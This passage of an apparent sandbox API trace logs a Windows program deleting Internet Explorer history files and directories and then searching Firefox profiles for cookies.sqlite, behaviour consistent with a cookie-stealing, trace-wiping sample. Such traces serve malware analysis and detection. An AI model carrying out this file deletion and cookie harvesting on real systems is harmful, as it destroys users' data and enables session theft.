lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\*.*", lpFindFileData=0x79b1400 | out: lpFindFileData=0x79b1400) returned 0x4405630 [0249.390] FindNextFileW (in: hFindFile=0x4405630, lpFindFileData=0x79b1400 | out: lpFindFileData=0x79b1400) returned 1 [0249.390] FindNextFileW (in: hFindFile=0x4405630, lpFindFileData=0x79b1400 | out: lpFindFileData=0x79b1400) returned 1 [0249.390] lstrlenW (lpString="container.dat") returned 13 [0249.390] PathCombineW (in: pszDest=0x7aaf140, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5", pszFile="container.dat" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\container.dat") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\container.dat" [0249.390] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\container.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\container.dat")) returned 1 [0249.390] FindNextFileW (in: hFindFile=0x4405630, lpFindFileData=0x79b1400 | out: lpFindFileData=0x79b1400) returned 1 [0249.390] lstrlenW (lpString="MSHist012018110620181107") returned 24 [0249.390] PathCombineW (in: pszDest=0x7aaf140, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5", pszFile="MSHist012018110620181107" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012018110620181107") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012018110620181107" [0249.390] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012018110620181107") returned 98 [0249.391] PathCombineW (in: pszDest=0x7aaf350, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012018110620181107", pszFile="*.*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012018110620181107\\*.*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012018110620181107\\*.*" [0249.391] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012018110620181107\\*.*", lpFindFileData=0x79b1870 | out: lpFindFileData=0x79b1870) returned 0x4404f10 [0249.391] FindNextFileW (in: hFindFile=0x4404f10, lpFindFileData=0x79b1870 | out: lpFindFileData=0x79b1870) returned 1 [0249.391] FindNextFileW (in: hFindFile=0x4404f10, lpFindFileData=0x79b1870 | out: lpFindFileData=0x79b1870) returned 1 [0249.391] lstrlenW (lpString="container.dat") returned 13 [0249.391] PathCombineW (in: pszDest=0x79b1660, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012018110620181107", pszFile="container.dat" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012018110620181107\\container.dat") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012018110620181107\\container.dat" [0249.391] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012018110620181107\\container.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\mshist012018110620181107\\container.dat")) returned 1 [0249.392] FindNextFileW (in: hFindFile=0x4404f10, lpFindFileData=0x79b1870 | out: lpFindFileData=0x79b1870) returned 0 [0249.392] FindClose (in: hFindFile=0x4404f10 | out: hFindFile=0x4404f10) returned 1 [0249.392] RemoveDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012018110620181107" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\mshist012018110620181107")) returned 1 [0249.392] FindNextFileW (in: hFindFile=0x4405630, lpFindFileData=0x79b1400 | out: lpFindFileData=0x79b1400) returned 0 [0249.392] FindClose (in: hFindFile=0x4405630 | out: hFindFile=0x4405630) returned 1 [0249.392] RemoveDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\history\\history.ie5")) returned 1 [0249.393] FindNextFileW (in: hFindFile=0x4405510, lpFindFileData=0x7aaeee0 | out: lpFindFileData=0x7aaeee0) returned 1 [0249.393] lstrlenW (lpString="Low") returned 3 [0249.393] PathCombineW (in: pszDest=0x7aaecd0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History", pszFile="Low" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low" [0249.393] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low") returned 65 [0249.394] PathCombineW (in: pszDest=0x7aae5c0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low", pszFile="*.*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\*.*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\*.*" [0249.394] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\*.*", lpFindFileData=0x79b1400 | out: lpFindFileData=0x79b1400) returned 0x4405630 [0249.394] FindNextFileW (in: hFindFile=0x4405630, lpFindFileData=0x79b1400 | out: lpFindFileData=0x79b1400) returned 1 [0249.394] FindNextFileW (in: hFindFile=0x4405630, lpFindFileData=0x79b1400 | out: lpFindFileData=0x79b1400) returned 1 [0249.394] lstrlenW (lpString="History.IE5") returned 11 [0249.394] PathCombineW (in: pszDest=0x7aaf140, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low", pszFile="History.IE5" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5" [0249.394] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5") returned 77 [0249.394] PathCombineW (in: pszDest=0x7aaf350, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5", pszFile="*.*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\*.*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\*.*" [0249.395] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\*.*", lpFindFileData=0x79b1870 | out: lpFindFileData=0x79b1870) returned 0x4404d90 [0249.396] FindNextFileW (in: hFindFile=0x4404d90, lpFindFileData=0x79b1870 | out: lpFindFileData=0x79b1870) returned 1 [0249.396] FindNextFileW (in: hFindFile=0x4404d90, lpFindFileData=0x79b1870 | out: lpFindFileData=0x79b1870) returned 1 [0249.396] lstrlenW (lpString="container.dat") returned 13 [0249.396] PathCombineW (in: pszDest=0x79b1660, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5", pszFile="container.dat" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\container.dat") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\container.dat" [0249.396] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\container.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\history\\low\\history.ie5\\container.dat")) returned 1 [0249.397] FindNextFileW (in: hFindFile=0x4404d90, lpFindFileData=0x79b1870 | out: lpFindFileData=0x79b1870) returned 0 [0249.397] FindClose (in: hFindFile=0x4404d90 | out: hFindFile=0x4404d90) returned 1 [0249.397] RemoveDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\history\\low\\history.ie5")) returned 1 [0249.397] FindNextFileW (in: hFindFile=0x4405630, lpFindFileData=0x79b1400 | out: lpFindFileData=0x79b1400) returned 0 [0249.397] FindClose (in: hFindFile=0x4405630 | out: hFindFile=0x4405630) returned 1 [0249.397] RemoveDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\history\\low")) returned 1 [0249.397] FindNextFileW (in: hFindFile=0x4405510, lpFindFileData=0x7aaeee0 | out: lpFindFileData=0x7aaeee0) returned 0 [0249.398] FindClose (in: hFindFile=0x4405510 | out: hFindFile=0x4405510) returned 1 [0249.398] SHGetFolderPathW (in: hwnd=0x0, csidl=32, hToken=0x0, dwFlags=0x0, pszPath=0x7aaeab0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCache") returned 0x0 [0249.398] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCache") returned 63 [0249.398] PathCombineW (in: pszDest=0x7aae530, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCache", pszFile="*.*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCache\\*.*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCache\\*.*" [0249.398] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCache\\*.*", lpFindFileData=0x7aaeee0 | out: lpFindFileData=0x7aaeee0) returned 0x4405510 [0249.398] FindNextFileW (in: hFindFile=0x4405510, lpFindFileData=0x7aaeee0 | out: lpFindFileData=0x7aaeee0) returned 1 [0249.398] FindNextFileW (in: hFindFile=0x4405510, lpFindFileData=0x7aaeee0 | out: lpFindFileData=0x7aaeee0) returned 1 [0249.398] lstrlenW (lpString="Content.IE5") returned 11 [0249.398] PathCombineW (in: pszDest=0x7aaecd0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCache", pszFile="Content.IE5" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Content.IE5") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Content.IE5" [0249.398] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Content.IE5") returned 75 [0249.399] PathCombineW (in: pszDest=0x7aae5c0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Content.IE5", pszFile="*.*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Content.IE5\\*.*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Content.IE5\\*.*" [0249.399] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Content.IE5\\*.*", lpFindFileData=0x79b1400 | out: lpFindFileData=0x79b1400) returned 0xffffffffffffffff [0249.399] FindClose (in: hFindFile=0xffffffffffffffff | out: hFindFile=0xffffffffffffffff) returned 0 [0249.399] FindClose (in: hFindFile=0x4405510 | out: hFindFile=0x4405510) returned 1 [0249.399] lstrlenA (lpString="%APPDATA%") returned 9 [0249.400] ExpandEnvironmentStringsW (in: lpSrc="%APPDATA%\\Mozilla\\Firefox\\Profiles", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x3f [0249.400] ExpandEnvironmentStringsW (in: lpSrc="%APPDATA%\\Mozilla\\Firefox\\Profiles", lpDst=0x7aae530, nSize=0x3f | out: lpDst="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 0x3f [0249.400] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 62 [0249.400] lstrlenW (lpString="cookies.sqlite") returned 14 [0249.400] PathCombineW (in: pszDest=0x7aaef30, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles", pszFile="cookies.sqlite" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\cookies.sqlite") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\cookies.sqlite" [0249.400] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\cookies.sqlite", lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 0xffffffffffffffff [0249.403] PathCombineW (in: pszDest=0x7aaef30, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*" [0249.403] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*", lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 0x4404f10 [0249.403] FindNextFileW (in: hFindFile=0x4404f10, lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 1 [0249.403] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.403] FindNextFileW (in: hFindFile=0x4404f10, lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 1 [0249.403] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.403] lstrlenW (lpString="8i341t8m.default") returned 16 [0249.403] PathCombineW (in: pszDest=0x7aaef30, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles", pszFile="8i341t8m.default" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default" [0249.403] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x50 [0249.403] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default", lpDst=0x7aae5c0, nSize=0x50 | out: lpDst="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default") returned 0x50 [0249.403] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default") returned 79 [0249.403] lstrlenW (lpString="cookies.sqlite") returned 14 [0249.403] PathCombineW (in: pszDest=0x79b1400, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default", pszFile="cookies.sqlite" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cookies.sqlite") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cookies.sqlite" [0249.403] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cookies.sqlite", lpFindFileData=0x7aaf140 | out: lpFindFileData=0x7aaf140) returned 0x44056f0 [0249.409] lstrlenW (lpString="cookies.sqlite") returned 14 [0249.410] lstrlenW (lpString="cookies.sqlite") returned 14 [0249.410] wcscpy (in: _Dest=0x79b1638, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default" [0249.411] GetProcAddress (hModule=0x7ff977360000, lpProcName="StrRChrW") returned 0x7ff97736dd80 [0249.411] StrRChrW (lpStart="cookies.sqlite", lpEnd=0x0, wMatch=0xfffffffffff0005c) returned 0x0 [0249.411] PathCombineW (in: pszDest=0x79b1638, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default", pszFile="cookies.sqlite" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cookies.sqlite") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cookies.sqlite" [0249.411] FindNextFileW (in: hFindFile=0x44056f0, lpFindFileData=0x7aaf140 | out: lpFindFileData=0x7aaf140) returned 0 [0249.411] FindClose (in: hFindFile=0x44056f0 | out: hFindFile=0x44056f0) returned 1 [0249.412] PathCombineW (in: pszDest=0x79b1400, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\*" [0249.412] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\*", lpFindFileData=0x7aaf140 | out: lpFindFileData=0x7aaf140) returned 0x4404d90 [0249.413] FindNextFileW (in: hFindFile=0x4404d90, lpFindFileData=0x7aaf140 | out: lpFindFileData=0x7aaf140) returned 1 [0249.513] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.513] FindNextFileW (in: hFindFile=0x4404d90, lpFindFileData=0x7aaf140 | out: lpFindFileData=0x7aaf140) returned 1 [0249.513] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.513] FindNextFileW (in: hFindFile=0x4404d90, lpFindFileData=0x7aaf140 | out: lpFindFileData=0x7aaf140) returned 1 [0249.513] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.513] FindNextFileW (in: hFindFile=0x4404d90, lpFindFileData=0x7aaf140 | out: lpFindFileData=0x7aaf140) returned 1 [0249.513] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.513] FindNextFileW (in: hFindFile=0x4404d90, lpFindFileData=0x7aaf140 | out: lpFindFileData=0x7aaf140) returned 1 [0249.514] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.514] FindNextFileW (in: hFindFile=0x4404d90, lpFindFileData=0x7aaf140 | out: lpFindFileData=0x7aaf140) returned 1 [0249.514] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.514] FindNextFileW (in: hFindFile=0x4404d90, lpFindFileData=0x7aaf140 | out: lpFindFileData=0x7aaf140) returned 1 [0249.514] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.514] FindNextFileW (in: hFindFile=0x4404d90, lpFindFileData=0x7aaf140 | out: lpFindFileData=0x7aaf140) returned 1 [0249.514] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.514] lstrlenW (lpString="bookmarkbackups") returned 15 [0249.514] PathCombineW (in: pszDest=0x79b1400, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default", pszFile="bookmarkbackups" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups" [0249.514] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x60 [0249.514] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups", lpDst=0x7aaf3a0, nSize=0x60 | out: lpDst="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups") returned 0x60 [0249.514] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups") returned 95 [0249.514] lstrlenW (lpString="cookies.sqlite") returned 14 [0249.514] PathCombineW (in: pszDest=0x79b19b0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups", pszFile="cookies.sqlite" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\cookies.sqlite") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\cookies.sqlite" [0249.514] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\cookies.sqlite", lpFindFileData=0x79b1750 | out: lpFindFileData=0x79b1750) returned 0xffffffffffffffff [0249.524] PathCombineW (in: pszDest=0x79b19b0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\*" [0249.524] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\*", lpFindFileData=0x79b1750 | out: lpFindFileData=0x79b1750) returned 0x4405870 [0249.524] FindNextFileW (in: hFindFile=0x4405870, lpFindFileData=0x79b1750 | out: lpFindFileData=0x79b1750) returned 1 [0249.524] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.524] FindNextFileW (in: hFindFile=0x4405870, lpFindFileData=0x79b1750 | out: lpFindFileData=0x79b1750) returned 1 [0249.524] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.524] FindNextFileW (in: hFindFile=0x4405870, lpFindFileData=0x79b1750 | out: lpFindFileData=0x79b1750) returned 0 [0249.524] FindClose (in: hFindFile=0x4405870 | out: hFindFile=0x4405870) returned 1 [0249.524] FindNextFileW (in: hFindFile=0x4404d90, lpFindFileData=0x7aaf140 | out: lpFindFileData=0x7aaf140) returned 1 [0249.524] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.524] FindNextFileW (in: hFindFile=0x4404d90, lpFindFileData=0x7aaf140 | out: lpFindFileData=0x7aaf140) returned 1 [0249.524] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.524] FindNextFileW (in: hFindFile=0x4404d90, lpFindFileData=0x7aaf140 | out: lpFindFileData=0x7aaf140) returned 1 [0249.524] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.524] FindNextFileW (in: hFindFile=0x4404d90, lpFindFileData=0x7aaf140 | out: lpFindFileData=0x7aaf140) returned 1 [0249.524] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.524] FindNextFileW (in: hFindFile=0x4404d90, lpFindFileData=0x7aaf140 | out: lpFindFileData=0x7aaf140) returned 1 [0249.525] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.525] FindNextFileW (in: hFindFile=0x4404d90, lpFindFileData=0x7aaf140 | out: lpFindFileData=0x7aaf140) returned 1 [0249.525] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.525] lstrlenW (lpString="crashes") returned 7 [0249.525] PathCombineW (in: pszDest=0x79b1400, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default", pszFile="crashes" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes" [0249.525] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x58 [0249.525] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes", lpDst=0x7aaf3a0, nSize=0x58 | out: lpDst="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes") returned 0x58 [0249.525] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes") returned 87 [0249.525] lstrlenW (lpString="cookies.sqlite") returned 14 [0249.525] PathCombineW (in: pszDest=0x79b19b0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes", pszFile="cookies.sqlite" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\cookies.sqlite") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\cookies.sqlite" [0249.525] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\cookies.sqlite", lpFindFileData=0x79b1750 | out: lpFindFileData=0x79b1750) returned 0xffffffffffffffff [0249.527] PathCombineW (in: 